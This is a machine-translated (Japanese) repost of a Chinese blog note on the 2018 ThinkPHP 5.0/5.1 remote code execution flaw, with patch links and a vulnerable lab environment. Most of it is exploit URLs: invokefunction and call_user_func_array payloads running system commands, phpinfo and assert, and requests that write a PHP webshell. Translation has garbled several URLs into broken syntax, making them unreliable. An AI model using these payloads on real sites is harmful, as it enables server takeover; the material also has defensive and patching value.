thinkphp5.xフルバージョン、任意のコードを実行getshell

ThinkPHP公式2018年12月9日には、重要なリリースされたセキュリティ更新プログラムを、深刻なリモートでコードが実行される脆弱性を修正します。更新は主に十分なテストを行わずにフレームコントローラ名はバージョン5.0と5.1を含む必須のルーティングgetshell脆弱性、影響を受けるバージョンの非存在下での可能な順番につながる可能性があるため、セキュリティ更新プログラムに関連する、できるだけ早く最新バージョンにアップデートすることが推奨されます。

主な理由は、「\」エラー

パッチ:

Thinkphp v5.0.xパッチ住所:  https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.xパッチ住所:  https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

環境住所:

ドッキングウィンドウ環境の脆弱性出典:https://github.com/vulnspy/thinkphp-5.1.29

開発します

1.リモートコマンド実行EXP:

http:// localhostを:?9096 /公共/ index.phpをS =インデックス/だと思う\アプリ/ invokefunction&機能= call_user_func_array&VARS [0] =システム&VARS [1] [] =にwhoami

2.リモートでコードが実行されます

HTTP:// localhostを:?9096 /公共/ index.phpをのS =インデックス/考える\アプリケーション/ invokeFunction&機能= call_user_func_arrayの\&VARS [0] =のphpinfo&VARS [1] [] = 1つの#のコード実行のphpinfo()

HTTP// 127.0。 ?? 0.1 / index.phpをS =インデックス / \要求/入力データは[] =のphpinfo(思う)&フィルタ=#1 5.1.xのアサートバージョン実行するphpinfo()

HTTP// 127.0.0.1/index.php?s=indexを/ \ \コンテナ/ invokefunction&だと思う機能= call_user_func_array&VARS [0] =のphpinfo&VARS [1] [] = 1つの#5.1.xののバージョンの

HTTP// [127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&varsを0] =アサート&VARS [1 ] [] =のphpinfo()#の5.0.xののバージョン

3.写シェル

http:// 127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content = <?PHPの%の20phpinfo();?>
?のhttp:// localhostを:9096 /公共/ index.phpをS =インデックス/だと思う\アプリ/ invokefunction&機能= call_user_func_array VARS [0] =システム&VARS&[1] [] =エコー "<?PHPのするphpinfo();?>" >> 2.php

 

おすすめ

転載: www.cnblogs.com/-chenxs/p/11573566.html